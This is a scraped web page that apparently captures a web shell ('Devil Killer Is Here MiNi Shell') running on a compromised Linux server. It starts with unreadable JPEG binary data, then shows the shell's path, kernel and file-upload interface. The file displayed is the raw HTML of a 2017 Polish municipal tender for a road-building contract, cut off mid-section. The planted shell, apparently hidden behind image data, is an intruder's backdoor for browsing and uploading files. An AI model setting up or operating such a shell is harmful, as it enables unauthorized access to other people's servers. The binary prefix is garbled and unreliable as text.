JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20171019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20171019/604081-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 604081-N-2017 z dnia 2017-10-19 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Świątki</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">,,Budowa odcinka drogi wewnętrznej (o parametrach drogi klasy technicznej D) oraz zjazdu publicznego z drogi wojewódzkiej nr 530 na drogę wewnętrzną" </span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Przedmiot zamówienia współfinansowany jest ze środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach Programu Rozwoju Obszarów Wiejskich na lata 2014-2020</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Świątki</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">51074320300000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Świątki</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">87</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">11008 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Świątki</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">warmińsko-mazurskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">89 6169883, 6169890 w. 109</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">urzad@swiatki.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">896 169 822</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://bip.swiatki.nowoczesnagmina.pl/?c=179</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://bip.swiatki.nowoczesnagmina.pl/?c=179</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://bip.swiatki.nowoczesnagmina.pl/?c=179</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">,,Budowa odcinka drogi wewnętrznej (o parametrach drogi klasy technicznej D) oraz zjazdu publicznego z drogi wojewódzkiej nr 530 na drogę wewnętrzną" </span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ROS.271.11.2017 </span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest zaprojektowanie i budowa ,,Budowa odcinka drogi wewnętrznej (o parametrach drogi klasy technicznej D) oraz zjazdu publicznego z drogi wojewódzkiej nr 530 na drogę wewnętrzną".Przedmiot zamówienia nazwany jest w dalszej części SIWZ ,,przedmiotem zamówienia". 2. Przedmiotzamówienia współfinansowany jest ze środków Europejskiego Funduszu Rolnego na rzecz RozwojuObszarów Wiejskich w ramach Programu Rozwoju Obszarów Wiejskich na lata 2014-2020 3. Przedmiotzamówienia obejmuje w szczególności: 1) Zaprojektowanie i wybudowanie drogi zgodnie z PFU orazuzyskanie pozwolenia na budowę. 2) Zaprojektowanie i wybudowanie dodatkowo 2 przepustów izjazdów na działki nr 281412_2.0011.27/10 oraz 281412_2.0011.27/9 sąsiednie nie uwzględnione w PFUoraz odprowadzenie wody z rowu projektowanego do cieku wodnego na działce 281412_2.0011.258; 3)kosztorys; 4) Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (STWiORB); 5)Uzyskanie pozwolenia na budowę; 6) Roboty w zakresie przygotowania terenu pod budowę; 7)Fundamentowanie dróg; 8) Roboty w zakresie nawierzchni dróg; 9) Odwodnienia; 10) Robotywykończeniowe; 11) Zapewnienie obsługi geodezyjnej i obsługi geotechnicznej; 12) Uzyskanie odbiorówi pozwoleń na użytkowanie. 4. Szczegółowy opis przedmiotu zamówienia w niniejszym postępowaniuzostał zawarty w dokumentacji PFU, SIWZ, wzorze umowy wraz z załącznikami. 5. Wykonawca wykonaprzedmiot zamówienia na podstawie PFU, SIWZ wraz z załącznikami, pytaniami i odpowiedziamiudzielonymi w trakcie procedury o udzielenie zamówienia publicznego oraz przedmiarami robót, a także,obowiązującymi przepisami szczegółowymi i sztuką budowlaną, oraz zapewni niezbędną obsługęgeodezyjną, geotechniczną wraz z okresem gwarancji i rękojmi. 6. Kody dotyczące przedmiotuzamówienia określone we Wspólnym Słowniku Zamówień: CPV: 45233220-7; 45111200-0; 45233320-8;45232130-2; 45233161-5; 45450000-6. 1) Realizacja zamówienia podlega prawu polskiemu, w tym wszczególności ustawie z dnia 7 lipca 1994 r. Prawo budowlane. 2) W przypadku wskazania wdokumentacji PFU, projektowej, STWIORB, przedmiarach, SIWZ znaków towarowych, patentów lubpochodzenia, a także norm, aprobat technicznych oraz systemów odniesienia, Zamawiający dopuszczazaoferowanie rozwiązań równoważnych w stosunku do wskazanych w dokumentacji projektowej,STWIORB, przedmiarach oraz SIWZ pod warunkiem, że zagwarantują one realizację robót w zgodzie zdokumentację projektową, STWiORB, przedmiarach, zapewnią uzyskanie parametrów technicznych niegorszych od założonych w dokumentacji projektowej, STWIORB, przedmiarach, oraz SIWZ oraz będązgodne pod względem: a) gabarytów i konstrukcji (wielkość, rodzaj, właściwości fizyczne oraz liczbaelementów składowych); b) charakteru użytkowego (tożsamość funkcji); c) charakterystyki materiałowej(rodzaj i jakość materiałów); d) parametrów technicznych (wytrzymałość, trwałość, dane techniczne,itd.); e) parametrów bezpieczeństwa użytkowania. Wykonawca, który powołuje się na rozwiązaniarównoważne opisane przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego wramach przedmiotu zamówienia materiały, elementy, systemy spełniają wymagania określone przezZamawiającego. 3) Zamawiający informuje, że zgodnie z art. 30 ust. 8 ustawy Pzp wymagania, o którychmowa w przywołanym przepisie, wykonawca określi w Specyfikacjach Technicznych Wykonania iOdbioru Robót Budowlanych. W przywołanych w opisie przedmiotu zamówienia norm, aprobat,specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1 - 3 ustawy PzpZamawiający dopuszcza rozwiązania równoważne opisywane w ww. dokumentach. 4) Zamawiający żądawskazania przez Wykonawcę części zamówienia, których wykonanie zamierza powierzyćpodwykonawcom i podania przez Wykonawcę firm podwykonawców. 5) Stosownie do treści art. 29 ust.3a ustawy Pzp, w związku z art. 36 ust. 2 pkt 8a ustawy Pzp, Zamawiający wymaga, aby osobywykonujące czynności w zakresie realizacji zamówienia, polegające na bezpośrednim fizycznymświadczeniu robót budowlanych i usług (w szczególności zagęszczanie, przywiezienie materiałów,wyrównywanie dróg, układanie nawierzchni, operowanie/kierowanie sprzętem budowlanym) zatrudnionebyły przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę w rozumieniu art. 22 § 1ustawy z z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 2016 r., poz. 1666 z późn. zm.) 6) Sposóbdokumentowania zatrudnienia osób, o których mowa wyżej oraz uprawnienia zamawiającego w zakresiekontroli spełniania przez Wykonawcę wymagań, o których mowa wyżej oraz sankcji z tytułuniespełnienia tych wymagań zostały zawarte w załączniku nr 6 wzorze umowy 7) Zamawiającyprzewiduje możliwość udzielenia zamówienia o którym mowa w art. 67 ust. 1 pkt 6 ustawy Prawozamówień publicznych: a) w okresie 3 lat od dnia udzielenia zamówienia podstawowegodotychczasowemu wykonawcy zamówienia, polegającego na powtórzeniu podobnych robótbudowlanych, o których mowa w PFU roboty w zakresie przygotowania terenu pod budowę,fundamentowanie dróg, roboty w zakresie nawierzchni dróg, chodniki, roboty wykończeniowe, wwysokości 30%,- 102,30 mb b) wartość zamówienia powtórzonego zostanie ustalona po negocjacjach zwykonawcą, wybranym w niniejszym postepowaniu, z zastrzeżeniem, że ceny jednostkowe nie będąwyższe niż ceny zaoferowane w niniejszym postępowaniu, c) zamówienia powtórzone zostaną udzielonena warunkach analogicznych do warunków określonych w niniejszym postępowaniu (dotyczy równieżkryteriów oceny ofert), d) zamówienie powtórzone zostanie udzielone w przypadku posiadania środkówfinansowych - w ramach kontynuacji przedsięwzięcia opisanego w Specyfikacji Istotnych WarunkówZamówienia i zgodnie ze sposobem realizacji zawartym w SIWZ i wzorze umowy wraz z załącznikami.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45233220-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111200-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233320-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45232130-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233161-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45450000-6</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, októrych mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: Określenie przedmiotu,wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: 7) Zamawiający przewiduje możliwość udzieleniazamówienia o którym mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych: a) w okresie 3lat od dnia udzielenia zamówienia podstawowego dotychczasowemu wykonawcy zamówienia,polegającego na powtórzeniu podobnych robót budowlanych, o których mowa w PFU roboty w zakresieprzygotowania terenu pod budowę, fundamentowanie dróg, roboty w zakresie nawierzchni dróg,chodniki, roboty wykończeniowe, w wysokości 30%,- 102,30 mb b) wartość zamówienia powtórzonegozostanie ustalona po negocjacjach z wykonawcą, wybranym w niniejszym postepowaniu, zzastrzeżeniem, że ceny jednostkowe nie będą wyższe niż ceny zaoferowane w niniejszym postępowaniu,c) zamówienia powtórzone zostaną udzielone na warunkach analogicznych do warunków określonych wniniejszym postępowaniu (dotyczy również kryteriów oceny ofert), d) zamówienie powtórzone zostanieudzielone w przypadku posiadania środków finansowych - w ramach kontynuacji przedsięwzięciaopisanego w Specyfikacji Istotnych Warunków Zamówienia i zgodnie ze sposobem realizacji zawartym wSIWZ i wzorze umowy wraz z załącznikami.</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2018-07-02</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2018-07-02</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Określenie warunków: Wykonawca składa oświadczenie o spełnieniu warunku. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Wykonawca składa oświadczenie o spełnieniu 